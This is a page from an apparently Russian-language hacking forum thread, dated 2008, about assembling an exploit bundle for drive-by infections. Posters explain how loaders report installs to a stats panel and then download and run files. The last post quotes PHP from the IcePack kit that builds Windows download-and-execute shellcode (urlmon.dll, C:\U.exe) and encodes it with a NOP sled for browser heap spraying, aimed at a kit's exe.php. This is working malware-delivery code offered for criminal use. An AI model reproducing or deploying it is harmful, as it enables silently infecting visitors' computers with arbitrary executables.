ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
Перезагрузить страницу Собираем свою связку эксплойтов.
   
Ответ
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 05.04.2008, 14:04
MaSter GeN
Познающий
Регистрация: 26.01.2008
Сообщений: 71
Провел на форуме:
280720

Репутация: 141
Отправить сообщение для MaSter GeN с помощью ICQ
По умолчанию
блин возник такой вопрос каким образом проверять отстук связки то есть загрузился ли фаил ? O_o
 
Ответить с цитированием

  #12  
Старый 05.04.2008, 14:19
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756

Репутация: 2032


Отправить сообщение для Piflit с помощью ICQ
По умолчанию
MaSter GeN
для этого есть лоадеры
 
Ответить с цитированием

  #13  
Старый 05.04.2008, 16:53
MaSter GeN
Познающий
Регистрация: 26.01.2008
Сообщений: 71
Провел на форуме:
280720

Репутация: 141
Отправить сообщение для MaSter GeN с помощью ICQ
По умолчанию
[QUOTE=Piflit]MaSter GeN
сенкс только я чуток неверно задал вопрос у меня допустим етсь статистика то есть кол-во трафа и тд и тп
то есть что бы мне в стате отображалось допустим количесво загрузок мне нужно сначало подгрузить лоадер ?и он уже в свое время пошлет запрос на страницу котороя в свою очередь изменит в бд какоенить значение под этим ип на допустим 1 ??
 
Ответить с цитированием

  #14  
Старый 05.04.2008, 17:17
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756

Репутация: 2032


Отправить сообщение для Piflit с помощью ICQ
По умолчанию
[QUOTE=MaSter GeN]
Цитата:
Сообщение от Piflit  
MaSter GeN
сенкс только я чуток неверно задал вопрос у меня допустим етсь статистика то есть кол-во трафа и тд и тп
то есть что бы мне в стате отображалось допустим количесво загрузок мне нужно сначало подгрузить лоадер ?и он уже в свое время пошлет запрос на страницу котороя в свою очередь изменит в бд какоенить значение под этим ип на допустим 1 ??
типа. лоадер стучит на стату + грузит и запускает нужные файлы.
 
Ответить с цитированием

  #15  
Старый 05.04.2008, 17:20
MaSter GeN
Познающий
Регистрация: 26.01.2008
Сообщений: 71
Провел на форуме:
280720

Репутация: 141
Отправить сообщение для MaSter GeN с помощью ICQ
По умолчанию
[QUOTE=Piflit]
Цитата:
Сообщение от MaSter GeN  
типа. лоадер стучит на стату + грузит и запускает нужные файлы.
угу все догнал сенкс ещё раз )
 
Ответить с цитированием

  #16  
Старый 06.04.2008, 11:31
MaSter GeN
Познающий
Регистрация: 26.01.2008
Сообщений: 71
Провел на форуме:
280720

Репутация: 141
Отправить сообщение для MaSter GeN с помощью ICQ
По умолчанию
такс возник ещё такой вопросик каким образом сгенерорвать такой шелл код что бы при при изаении допустим url менялся url к лоадеру ? или придеться какжый раз при измении придеться генерроть новый шелл ?
P.S все догнал гогадка была верная подсмотрел в icepack кому интересно вот нужный кусок кода :
PHP код:
function DownAndExec($url)
{
    $sc  ="\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03";
    $sc .="\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74";
    $sc .="\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E";
    $sc .="\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03";
    $sc .="\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C";
    $sc .="\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40";
    $sc .="\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C";
    $sc .="\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC";
    $sc .="\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F";
    $sc .="\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB";
    $sc .="\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83";
    $sc .="\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF";
    $sc .="\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF" $url;
    
    return $sc;
}

function PrintPayLoad($sc)
{
    $result '';
    
    for($i=0;$i<=strlen($sc);$i+=2)
    {
        $n1 $sc[$i];
        $n2 $sc[$i+1];
        $n1 ord($n1)+ord($n2)*256;
        $n1 dechex($n1);
        
        while(strlen($n1)<4)
        {
            $n1='0'.$n1;
        }
        $result .= "%u{$n1}";
    }
    return "%u9090%u9090".$result;

а вот сам процесс генерирования
PHP код:
$dl_path  $config['main_url'] . "/exe.php";
$ShellCode PrintPayLoad(DownAndExec($dl_path)); 
Последний раз редактировалось MaSter GeN; 06.04.2008 в 11:42..
 
Ответить с цитированием
Ответ
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ